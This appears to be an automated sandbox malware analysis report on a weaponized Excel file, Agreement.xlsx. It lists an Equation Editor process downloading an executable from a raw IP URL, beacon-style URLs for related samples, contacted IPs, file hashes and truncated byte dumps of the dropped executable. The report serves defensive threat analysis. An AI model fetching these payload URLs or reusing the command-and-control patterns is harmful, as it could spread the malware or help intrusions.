                                                                                                                                                  http://investor.msn.com/explorer.exe, 00000006.00000000.2166477724.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.espn.go.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://service2.bfast.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://www.%s.comPAexplorer.exe, 00000006.00000000.2161587141.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          low

                                                                                                                                                          Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          66.152.187.17
                                                                                                                                                          unknownUnited States
                                                                                                                                                          35916MULTA-ASN1UStrue
                                                                                                                                                          198.185.159.144
                                                                                                                                                          unknownUnited States
                                                                                                                                                          53831SQUARESPACEUSfalse
                                                                                                                                                          18.194.54.219
                                                                                                                                                          unknownUnited States
                                                                                                                                                          16509AMAZON-02UStrue
                                                                                                                                                          34.102.136.180
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUStrue
                                                                                                                                                          31.220.110.116
                                                                                                                                                          unknownLithuania
                                                                                                                                                          47583AS-HOSTINGERLTtrue

                                                                                                                                                          General Information

                                                                                                                                                          Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                          Analysis ID:345179
                                                                                                                                                          Start date:27.01.2021
                                                                                                                                                          Start time:20:04:52
                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 9m 42s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:light
                                                                                                                                                          Sample file name:Agreement.xlsx
                                                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                          Number of analysed new started processes analysed:9
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • HDC enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.troj.expl.evad.winXLSX@9/6@7/5
                                                                                                                                                          EGA Information:Failed
                                                                                                                                                          HDC Information:
                                                                                                                                                          • Successful, ratio: 23.6% (good quality ratio 22.5%)
                                                                                                                                                          • Quality average: 70.1%
                                                                                                                                                          • Quality standard deviation: 29.3%
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 94%
                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Adjust boot time
                                                                                                                                                          • Enable AMSI
                                                                                                                                                          • Found application associated with file extension: .xlsx
                                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                          • Attach to Office via COM
                                                                                                                                                          • Scroll down
                                                                                                                                                          • Close Viewer
                                                                                                                                                          Warnings:
                                                                                                                                                          Show All
                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                          • TCP Packets have been reduced to 100

                                                                                                                                                          Simulations

                                                                                                                                                          Behavior and APIs

                                                                                                                                                          TimeTypeDescription
                                                                                                                                                          20:06:10API Interceptor37x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                          20:06:12API Interceptor106x Sleep call for process: vbc.exe modified
                                                                                                                                                          20:06:35API Interceptor204x Sleep call for process: wlanext.exe modified
                                                                                                                                                          20:07:19API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                          IPs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          66.152.187.17hmH9ZhBQFD.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.mgg360.com/bw82/?AjR=92sn3P3sAy9ScZuSdsZEcwqQjW3QIGzSMG74ovAifJzLmk/UOXX3SzG66EKQnpGmQ1wq&ndnDnN=-Zh4gtKhzFrx
                                                                                                                                                          Signatures Required 21-01-2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.mgg360.com/bw82/?KPO0Ltt0=92sn3P3pA19WcJiefsZEcwqQjW3QIGzSMGjo0scjbpzKmVTSJHG7E3+45hmGj5CVb2tavg==&GzuD_=dp5pdVbpjd
                                                                                                                                                          fl3TkfT33S.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.mgg360.com/bw82/?EzuxZr=3f-8&XrFPk4mP=92sn3P3sAy9ScZuSdsZEcwqQjW3QIGzSMG74ovAifJzLmk/UOXX3SzG66HmA7YadXAZ72cM2sQ==
                                                                                                                                                          2021 DOCS.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.mgg360.com/bw82/?Bxo4nDP=92sn3P3pA19WcJiefsZEcwqQjW3QIGzSMGjo0scjbpzKmVTSJHG7E3+45hmGj5CVb2tavg==&pJE=YXglJj4Py
                                                                                                                                                          xwE6WlNHu1.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.mgg360.com/bw82/?BjU=92sn3P3sAy9ScZuSdsZEcwqQjW3QIGzSMG74ovAifJzLmk/UOXX3SzG66EKQnpGmQ1wq&Jdy=THIDZXZPt04tW
                                                                                                                                                          F9FX9EoKDL.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.mgg360.com/bw82/?KZQL=92sn3P3sAy9ScZuSdsZEcwqQjW3QIGzSMG74ovAifJzLmk/UOXX3SzG66Hm5kp6eZWF82cMx/g==&RlW=bjoxnFJXA8hpCv
                                                                                                                                                          NEW ORDER 15DEC.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.mgg360.com/bw82/?ong0rTC=92sn3P3pA19WcJiefsZEcwqQjW3QIGzSMGjo0scjbpzKmVTSJHG7E3+45hmGj5CVb2tavg==&PFQL=nHI4EV
                                                                                                                                                          ShippingDoc12-08.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.mgg360.com/bw82/?T8Ll5xA=92sn3P3sAy9ScZuSdsZEcwqQjW3QIGzSMG74ovAifJzLmk/UOXX3SzG66EK64Z2mU34q&Txlt=Ovp4ZR4h4BgdPfY
                                                                                                                                                          at3nJkOFqF.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.mgg360.com/bw82/?2d=onxdA&-Zlpi6B=92sn3P3sAy9ScZuSdsZEcwqQjW3QIGzSMG74ovAifJzLmk/UOXX3SzG66EK64Z2mU34q
                                                                                                                                                          198.185.159.144Doc_37584567499454.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.soundon.events/csv8/?l48tdRq0=f1zFyjN0EmLviNF8fKKCz7YQnzvARTiViS3XLvwk6t41gXJpQ0SRSkWjGn1VRBwYOzEhaA==&RF=fra8
                                                                                                                                                          xl2Ml2iNJe.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.theatomicshots.com/xle/?-ZnD=LjoXU6n8-&iBrlPD=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUSLWPv7Pa79MYJLDg==
                                                                                                                                                          Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.sentire.design/incn/?9r_PU=-ZQLEn&e2Jdlzf8=5ltUxrttwFhptoEbwwSBkwhwumkFdmMXQM+4K6mrQNNQqM/0ADGIG+m5mhGMml3JysWX3Q==
                                                                                                                                                          hmH9ZhBQFD.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.magiclabs.media/bw82/?AjR=P2+pz5Ip5Thw4xSsr1TQmwqfNtgh4ua+i2k1cmEpjT3MKeCHzs63ua9PxpQsOBrBw3ru&ndnDnN=-Zh4gtKhzFrx
                                                                                                                                                          Signatures Required 21-01-2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.usmedicarenow.com/bw82/?KPO0Ltt0=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&GzuD_=dp5pdVbpjd
                                                                                                                                                          PO210119.exe.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.edmondscakes.com/2kf/?9r4P2=J484&xPGHVhT0=9XMLlWJTI6vAfrHRazBeuJnX2zF/KKkFVijVc9HuNL/CE78GsXIW/AGNdR4jkREGsVcZ
                                                                                                                                                          LOI.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.eatsourdough.com/zu8g/?bj=QvQF2MNn+oHkRRTSyytx3edINhmZPioUidW/VLxKdYkXSZlckZwTIbNrQkX4ebA4OyQo&Rx=LlyhAx4hlXV0
                                                                                                                                                          fl3TkfT33S.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.usmedicarenow.com/bw82/?XrFPk4mP=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibgeJtiEOx1IUxmal7w==&EzuxZr=3f-8
                                                                                                                                                          Qs6ySVV95N.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.usmedicarenow.com/bw82/?9rN46F=xVJHBdo8&u4Td2=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibgewyTkN/jUTxmaioA==
                                                                                                                                                          insz.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.qlifepharmacy.com/hko6/?b6l=GNi/DpI/o0IU2mlIts+MFBAG9T0dMGL590B2ep5La5xhQGCr0BB5YDI5YioaKEegNoVx&DbG=_FNlKl
                                                                                                                                                          Details...exeGet hashmaliciousBrowse
                                                                                                                                                          • www.kimquint.com/t052/?pPX=4cshQmakRJ4rOfrc+vaKpepuexOMGJP6AHyg5az6tVfj4oyeQSVKKfWPD+cchExBRaiI&1b=jnKtRfexr
                                                                                                                                                          Ulma9B5jo1.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.littlefreecherokeelibrary.com/xle/?UTdx=j0kojX1lOezO3MpNYqSB4xQ7fy015qg6Jc4pJwrM/nOhsl2ZSQmO9E8rTYC4c+3bSb7eWeWU8g==&opg=HL34vR7x-zNdZz
                                                                                                                                                          9gVzvJI8zq.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.usmedicarenow.com/bw82/?ElP=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibgSJ+yINolIC&Qtx=JlztxZOpbfa
                                                                                                                                                          ugGgUEbqio.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.usmedicarenow.com/bw82/?Gzux=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibjyZxTY12AhF&AnB=O2MxwrlpB
                                                                                                                                                          Yw5acDrhKd.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.silhouettebodyspa.com/de92/?FD=Txo8n6BX_BmT&vBZ=aW4bwX+7+rq/lVtFlzifkf7EnMQHuKASlHyg88U21n5YYvOPVn8iR8TT3RdPTa13WJ65
                                                                                                                                                          AnGaRFyL4O.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.sentire.design/incn/?BjR=5ltUxrtowChtt4IXywSBkwhwumkFdmMXQMmoW56qUtNRq9TyHTXEQ6e7lHGzh1PCwM+xugbLVQ==&ndndsT=KfvDDjnxw8Ql
                                                                                                                                                          Mv Maersk Kleven V949E_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.laurencosiovocalstudio.com/p7t/?LZND=kBrJoBOj5OEQVKOXcx6xaEgKFskLIwEkFghBBfGTZb6JR8v+XXQZ7/m6mE6TANuqT+bEcVC2gg==&MnZ=GXLth
                                                                                                                                                          f4tP1FPuGN.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.scheherazadelegault.com/csv8/?4h0=0hV2NfdVjmx+yfQvTLszaaA4nyOLrpeuP9TqtJZz9egJMD1sBqTfWGO8dzvjX59MdUiM72A8Sw==&wR=LJEtMDJ
                                                                                                                                                          SUNEJ PAYMENT.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.cameroncooperar.com/m8ec/?ETRTzvU=oW5CUikigFCJobF4LoDriRErNoDG5MXy9cQdn9L0Iy2n1VjfeIoqGObfEkiRrSpRq/xu&DzrLW=VDKPcpdPnjE8Qb
                                                                                                                                                          Mv Maersk Kleven V949E_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.laurencosiovocalstudio.com/p7t/?v6=kBrJoBOj5OEQVKOXcx6xaEgKFskLIwEkFghBBfGTZb6JR8v+XXQZ7/m6mHWDc8yRULyV&-ZS=W6ApnLe0

                                                                                                                                                          Domains

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          www.mgg360.comhmH9ZhBQFD.exeGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          Signatures Required 21-01-2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          fl3TkfT33S.exeGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          2021 DOCS.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          xwE6WlNHu1.exeGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          F9FX9EoKDL.exeGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          NEW ORDER 15DEC.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          ShippingDoc12-08.exeGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          at3nJkOFqF.exeGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17

                                                                                                                                                          ASN

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          SQUARESPACEUSDoc_37584567499454.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.144
                                                                                                                                                          quote20210126.exe.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.49.23.144
                                                                                                                                                          xl2Ml2iNJe.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.144
                                                                                                                                                          Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.144
                                                                                                                                                          vA0mtZ7JzJ.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.145
                                                                                                                                                          hmH9ZhBQFD.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.144
                                                                                                                                                          Signatures Required 21-01-2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.144
                                                                                                                                                          Documents.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.49.23.144
                                                                                                                                                          PO210119.exe.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.144
                                                                                                                                                          LOI.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.144
                                                                                                                                                          yty5HOxW3o.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.145
                                                                                                                                                          fl3TkfT33S.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.144
                                                                                                                                                          Qs6ySVV95N.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.144
                                                                                                                                                          PE20-RQ- 1638.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.49.23.144
                                                                                                                                                          0f9zzITIbk.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.145
                                                                                                                                                          insz.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.144
                                                                                                                                                          Details...exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.144
                                                                                                                                                          Ulma9B5jo1.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.144
                                                                                                                                                          xPkiX7vwNVqQf9I.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.185.159.145
                                                                                                                                                          yxYmHtT7uT.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.49.23.145
                                                                                                                                                          AMAZON-02USSignature.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 18.194.54.219
                                                                                                                                                          Doc_37584567499454.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 52.209.107.24
                                                                                                                                                          Documentaci#U00f3n.docGet hashmaliciousBrowse
                                                                                                                                                          • 35.163.191.195
                                                                                                                                                          Rolled Alloys Possible Infection.docxGet hashmaliciousBrowse
                                                                                                                                                          • 143.204.11.47
                                                                                                                                                          Order confirmation 64236000000025 26.01.2021.exeGet hashmaliciousBrowse
                                                                                                                                                          • 3.0.139.114
                                                                                                                                                          Rolled Alloys Possible Infection.docxGet hashmaliciousBrowse
                                                                                                                                                          • 143.204.11.17
                                                                                                                                                          ARCHIVOFile-20-012021.docGet hashmaliciousBrowse
                                                                                                                                                          • 35.163.191.195
                                                                                                                                                          FACTUUR-INV00012.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 52.216.237.43
                                                                                                                                                          FACTUUR-INV00012.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 52.216.95.11
                                                                                                                                                          daily scripts.exeGet hashmaliciousBrowse
                                                                                                                                                          • 34.242.129.172
                                                                                                                                                          0113 INV_PAK.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 44.240.171.172
                                                                                                                                                          wno5UOP8TJ.exeGet hashmaliciousBrowse
                                                                                                                                                          • 52.211.215.209
                                                                                                                                                          quote20210126.exe.exeGet hashmaliciousBrowse
                                                                                                                                                          • 3.140.151.209
                                                                                                                                                          PAYMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 34.251.154.69
                                                                                                                                                          PAYMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 34.249.208.250
                                                                                                                                                          DHL eMailShip delivery Form - securedPDF.htmlGet hashmaliciousBrowse
                                                                                                                                                          • 52.218.216.224
                                                                                                                                                          5Ur5p5e8r2.exeGet hashmaliciousBrowse
                                                                                                                                                          • 13.52.79.18
                                                                                                                                                          The Mental Health Center.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 52.216.245.238
                                                                                                                                                          Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 3.131.104.217
                                                                                                                                                          Xy4f5rcxOm.dllGet hashmaliciousBrowse
                                                                                                                                                          • 54.64.30.175
                                                                                                                                                          MULTA-ASN1UShmH9ZhBQFD.exeGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          Signatures Required 21-01-2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          fl3TkfT33S.exeGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          2021 DOCS.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          RE SHIPPING DOCS MNL 1X20GP+1X40HC ETD27012021pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • 72.44.77.80
                                                                                                                                                          xwE6WlNHu1.exeGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          PO_JAN907#092941_BARYSLpdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • 72.44.77.80
                                                                                                                                                          TIGW1Ow1O6.exeGet hashmaliciousBrowse
                                                                                                                                                          • 64.69.43.237
                                                                                                                                                          F9FX9EoKDL.exeGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          NEW ORDER 15DEC.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          Purchase Order#12202011.exeGet hashmaliciousBrowse
                                                                                                                                                          • 96.45.164.251
                                                                                                                                                          ShippingDoc12-08.exeGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          at3nJkOFqF.exeGet hashmaliciousBrowse
                                                                                                                                                          • 66.152.187.17
                                                                                                                                                          Shipment Document BL,INV And Packing List Attached.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.74.106.231
                                                                                                                                                          OZjLyhkYEf.exeGet hashmaliciousBrowse
                                                                                                                                                          • 173.82.106.140
                                                                                                                                                          POJ-100120 VTO-102620.docGet hashmaliciousBrowse
                                                                                                                                                          • 181.215.182.169
                                                                                                                                                          Report.docGet hashmaliciousBrowse
                                                                                                                                                          • 181.215.182.169
                                                                                                                                                          PO_10262020EX.docGet hashmaliciousBrowse
                                                                                                                                                          • 181.215.182.169
                                                                                                                                                          isb777amx.exeGet hashmaliciousBrowse
                                                                                                                                                          • 216.24.242.34
                                                                                                                                                          https://cyttatesful.com/CD/nridistribution.com/office_365_authentication/owa.phpGet hashmaliciousBrowse
                                                                                                                                                          • 173.82.115.103

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          No context

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm2[1].exe
                                                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):913408
                                                                                                                                                          Entropy (8bit):7.154427701201435
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:pSpEvPye6xWHafjVti8Hul35XH01bi5ZioU1s/Poevs5iyXsvYqXHLs7NvGhqMlW:0qvqe6g6fzHU5X01WTPU1s6
                                                                                                                                                          MD5:F49E0B01E26E5E197421C4260DD87545
                                                                                                                                                          SHA1:CF6ADE9E61D1264AE3EFC371D8B7D13E2F740647
                                                                                                                                                          SHA-256:7DFB2D60095157148FCB26BDFC4270CE6D5E3678C60628B8F683C4E1ADBD8043
                                                                                                                                                          SHA-512:D4BE5DB242754EBE848526D663872BE9239F729D21711E54BC7ED9FE2C5B1BF398F16ACEAD6D5EF829FEB8C7F45E57800F815DF5ECA80C2982ABBDC587B2C537
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Reputation:low
                                                                                                                                                          IE Cache URL:http://18.194.54.219/wows/hm2.exe
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m.`..............P.................. ... ....@.. .......................`............@.................................H...S.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H....... 4..(.......B...8R..............................................(A.....ema.......H.@..k.&XU..U...g...............|.. ...0Y...B....g;.=....y..#.b....J..u.8....xp8g=.......U.*.A.../o).....8...9{..a...;@U.1..M.. <...*..t.).....RG...O...cDA....l...FDN.Jps..:..dF.KP$..q.2.K...2..=....*|/.......c&.K..[....)..4....d.U...;r.`..].....}...5..k.d43..2L,SF_#G."B....S.p.9+....y..Z....sUt.7.R.J.4...|.c.......Y.B4...@.P`.5Wn.MI.M.?.[.....BU*..D.S.....b/p.R..s.
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32ED815C.emf
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):653280
                                                                                                                                                          Entropy (8bit):2.898629221825498
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:x34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:54UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                          MD5:023567A26C4FCEDCD6F74AE5975A1FA3
                                                                                                                                                          SHA1:C4B4978F180C1F04C1E6476FDE416D4A3452F500
                                                                                                                                                          SHA-256:11113A55316CAA641CC8C148FCF8C322FE4D7DEEDAAB038AA632C6C4811C8CCA
                                                                                                                                                          SHA-512:E311ECB57EA41E82C75C2D87CD812DB7143515471035A8CCD0628BAD25B6E239E24883A51D804B240B50A219BE0FE0CD1625B25B06CE2F4B8C999808790393A9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................#.l.#.......#.P.#..N.U..#...#.....8.#...#..N.U..#...#. ....y.Q..#...#. ............z.Q............................................X...%...7...................{ .@................C.a.l.i.b.r.............\.#.X.....#...#..2.Q........8.#.8.#..{.Q....`.#.....dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8980DBCA.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):48770
                                                                                                                                                          Entropy (8bit):7.801842363879827
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D99639AD.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):48770
                                                                                                                                                          Entropy (8bit):7.801842363879827
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
